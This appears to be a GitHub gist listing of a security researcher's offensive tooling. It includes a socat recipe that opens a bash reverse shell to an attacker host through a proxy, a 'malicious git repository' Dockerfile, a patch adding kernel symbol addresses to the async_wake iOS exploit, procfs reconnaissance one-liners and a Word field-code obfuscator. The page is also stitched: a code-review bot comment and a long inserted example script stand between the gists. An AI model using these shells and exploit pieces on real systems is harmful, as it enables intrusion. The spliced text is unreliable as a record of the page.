Etienne Stalmans staaldraad

staaldraad / README.md

Based on the excellent write-up at https://www.elttam.com.au/blog/ruby-deserialization/

Using YAML.dump(payload) in the above script doesn't work. It only produces the following YAML, which is worthless:

--- !ruby/object:Gem::Requirement
requirements:
- - ">="
  - !ruby/object:Gem::Version
    version: '0'
staaldraad / Dockerfile
Created Sep 4, 2018
Dockerfile to get a malicious git repository up and running
FROM ubuntu:16.04
RUN apt update ; \
apt install -y git apache2
RUN mkdir /srv/git
COPY git-http.conf .
RUN cat git-http.conf >> /etc/apache2/apache2.conf
staaldraad / socat through proxy
# On the attacker host (x.x.x.x): listen on 443 and wire the local tty to the
# incoming connection (raw, no local echo, so the remote pty handles it):
socat file:`tty`,raw,echo=0 tcp-listen:443
# On the target, which can only reach out through the HTTP proxy at 10.10.10.1:8222:
# 1) a relay that accepts on a unix socket and opens an HTTP CONNECT tunnel
#    through the proxy to x.x.x.x:443 (one child per connection):
socat UNIX-LISTEN:/tmp/x,reuseaddr,fork PROXY:10.10.10.1:x.x.x.x:443,proxyport=8222 &
# 2) an interactive bash on a pty, connected to that relay:
socat exec:'bash -li',pty,stderr,setsid,sigint,sane unix:"/tmp/x"
staaldraad / keybase.md

Keybase proof

I hereby claim:

  • I am staaldraad on github.
  • I am staaldraad (https://keybase.io/staaldraad) on keybase.
  • I have a public key ASBLRjbIk9YHmGLclVKxEorNIKsYZgbdW0uh0ugCrhdGYwo

To claim this, I am signing this object:

staaldraad / async_ios_11_1_2.patch
Last active Mar 27, 2018
Add iPhone 6 symbols along with the symbols @cji added for the iPad mini 2.
--- async_wake_ios 2/async_wake_ios/symbols.c 2017-12-11 17:01:53.000000000 +0100
+++ async_wake_ios/async_wake_ios/symbols.c 2017-12-13 13:17:32.000000000 +0100
@@ -131,6 +131,50 @@
0xFFFFFFF007194BBC, // KSYMBOL_SLEH_SYNC_EPILOG // look for xrefs to "Unsupported Class %u event code."
};
+uint64_t ksymbols_iphone_6_15b202[] = {
+ 0xFFFFFFF0074A4A4C, // KSYMBOL_OSARRAY_GET_META_CLASS,
+ 0xFFFFFFF007533CF8, // KSYMBOL_IOUSERCLIENT_GET_META_CLASS
+ 0xFFFFFFF0075354A0, // KSYMBOL_IOUSERCLIENT_GET_TARGET_AND_TRAP_FOR_INDEX
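Review bot: nothing in this hunk references the new `ksymbols_iphone_6_15b202[]` table, so as shown the iPhone 6 addresses are never selected; the device/build check that returns this table for 15B202 on an iPhone 6 should be part of the same change, or the hunk that adds it should be pointed to. Two style points on the visible lines: the comment on the first entry, `// KSYMBOL_OSARRAY_GET_META_CLASS,`, carries a trailing comma that the other entries lack, and the new array starts directly after the previous table's `};` with no blank line between them. Since the entries are looked up by position under the KSYMBOL_* names in the comments, the remaining 40 added lines need to keep exactly the order of the existing tables.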
staaldraad / uid_awk.sh
Created Dec 12, 2017
Get the uid, gid and groups of the current process without touching /etc/passwd or running the `id` command
awk -F: 'END {print "uid:"u" gid:"g" groups:"gg}{if($1=="Uid"){split($2,a," ");u=a[1]}if($1=="Gid"){split($2,a," ");g=a[1]}if($1=="Groups"){gg=$2}}' /proc/self/status
staaldraad / awk_netstat.sh
Last active Apr 12, 2019
awk to get details from /proc/net/tcp and /proc/net/udp when netstat and lsof are not available
# Gawk version (uses strtonum for the hex conversion). The kernel stores each
# IPv4 address as a little-endian 32-bit hex word, so the octets are read back to front.
# Remote address:port (column 3)
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($3,index($3,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($3,i,2))}{print x":"strtonum("0x"substr($3,index($3,":")+1,4))}'
# Local address:port (column 2)
grep -v "rem_address" /proc/net/tcp | awk '{x=strtonum("0x"substr($2,index($2,":")-2,2)); for (i=5; i>0; i-=2) x = x"."strtonum("0x"substr($2,i,2))}{print x":"strtonum("0x"substr($2,index($2,":")+1,4))}'
# No Gawk (strtonum unavailable, so the hex conversion is done in awk itself)
# Local
grep -v "rem_address" /proc/net/tcp | awk 'function hextodec(str,ret,n,i,k,c){
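The two procfs reads above, uid_awk.sh (identity from /proc/self/status) and awk_netstat.sh (sockets from /proc/net/tcp), as one added example that is not part of either gist: both are done in POSIX awk only, so they run where gawk's strtonum() is missing as well as where id, netstat and lsof are. The function names are mine, the functions read stdin so a captured file can be fed in during forensics, and the sample inputs are constructed in procfs layout, not real captures.

```shell
#!/bin/sh
# Added example (not from the gists): procfs-only identity and socket listing in POSIX awk.

# Identity: the Uid/Gid lines carry real, effective, saved and filesystem ids
# (tab separated); printing all four shows setuid situations the real uid hides.
proc_ids() {
    awk -F'\t' '
        $1 == "Uid:"    { uid = $2 "/" $3 "/" $4 "/" $5 }
        $1 == "Gid:"    { gid = $2 "/" $3 "/" $4 "/" $5 }
        $1 == "Groups:" { groups = $2; sub(/ +$/, "", groups) }
        END { print "uid=" uid " gid=" gid " groups=" groups }'
}

# Sockets: /proc/net/tcp stores each IPv4 address as a little-endian 32-bit hex
# word ("0100007F" is 127.0.0.1), the port as big-endian hex, and the state as a
# hex index into the kernel TCP state table. Column 8 is the owning uid.
proc_tcp() {
    awk '
        # POSIX awk has no strtonum(): convert hex digit by digit.
        function hex2dec(h,    i, n) {
            n = 0
            h = toupper(h)
            for (i = 1; i <= length(h); i++)
                n = n * 16 + index("0123456789ABCDEF", substr(h, i, 1)) - 1
            return n
        }
        # "AABBCCDD:PPPP" -> "dd.cc.bb.aa:port" (bytes reversed, port as-is).
        function addr(s,    hex, port, ip) {
            hex  = substr(s, 1, index(s, ":") - 1)
            port = substr(s, index(s, ":") + 1)
            ip = hex2dec(substr(hex, 7, 2)) "." hex2dec(substr(hex, 5, 2))
            ip = ip "." hex2dec(substr(hex, 3, 2)) "." hex2dec(substr(hex, 1, 2))
            return ip ":" hex2dec(port)
        }
        BEGIN {
            # Order matches the kernel TCP states: 01=ESTABLISHED ... 0A=LISTEN.
            split("ESTABLISHED SYN_SENT SYN_RECV FIN_WAIT1 FIN_WAIT2 TIME_WAIT CLOSE CLOSE_WAIT LAST_ACK LISTEN CLOSING NEW_SYN_RECV", st, " ")
        }
        NR > 1 { print addr($2), addr($3), st[hex2dec($4)], "uid=" $8 }'
}

# Constructed samples in procfs layout (not real captures).
sample_status() {
    printf 'Name:\tsh\nUid:\t1000\t0\t0\t0\nGid:\t1000\t1000\t1000\t1000\nGroups:\t4 24 27 1000 \n'
}
sample_tcp() {
    printf '%s\n' \
      '  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode' \
      '   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 12345 1 0000000000000000 100 0 0 10 0' \
      '   1: 0A0A0A0A:C350 0101A8C0:01BB 01 00000000:00000000 00:00000000 00000000  1000        0 12346 1 0000000000000000 100 0 0 10 0'
}

# On a live box: proc_ids < /proc/self/status ; proc_tcp < /proc/net/tcp
sample_status | proc_ids
sample_tcp | proc_tcp
```

The same address decoding applies to /proc/net/udp, which has the identical column layout; only the state column is meaningless there (07, i.e. CLOSE, for every unconnected socket).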
staaldraad / str2quote.py
#!/usr/bin/env python
# Converts a string to a Word {QUOTE} field code: each character becomes its
# decimal code point, so the field renders the text without it appearing literally.
try:
    input = raw_input  # Python 2
except NameError:
    pass
print("Converts a string to the {QUOTE} Field code")
st = input("String to convert: ")
v = [str(ord(c)) for c in st]
print("{ QUOTE %s }" % ' '.join(v))
staaldraad / oauthServer.go
Last active Dec 21, 2017
A mini OAuth server for Azure
package main
import (
"crypto/tls"
"fmt"
"io/ioutil"
"net/http"
"net/url"
"strings"
)
staaldraad / findForms.ps1
Add-Type -assembly "Microsoft.Office.Interop.Outlook";
$outlook = New-Object -comobject Outlook.Application;
$mapi = $outlook.GetNamespace("MAPI")
# 6 = olFolderInbox
$fld = $outlook.Session.GetDefaultFolder(6);
# Custom form definitions are stored as hidden items (table contents 1 = olHiddenItems)
# with this message class; the default table columns start with EntryID.
$t = $fld.GetTable("[MessageClass] = 'IPM.Microsoft.FolderDesign.FormsDescription'",1);
$c = $t.GetRowCount();
while($c -gt 0) {
$r = $t.GetNextRow();
$itm = $mapi.GetItemFromID($r.item(1));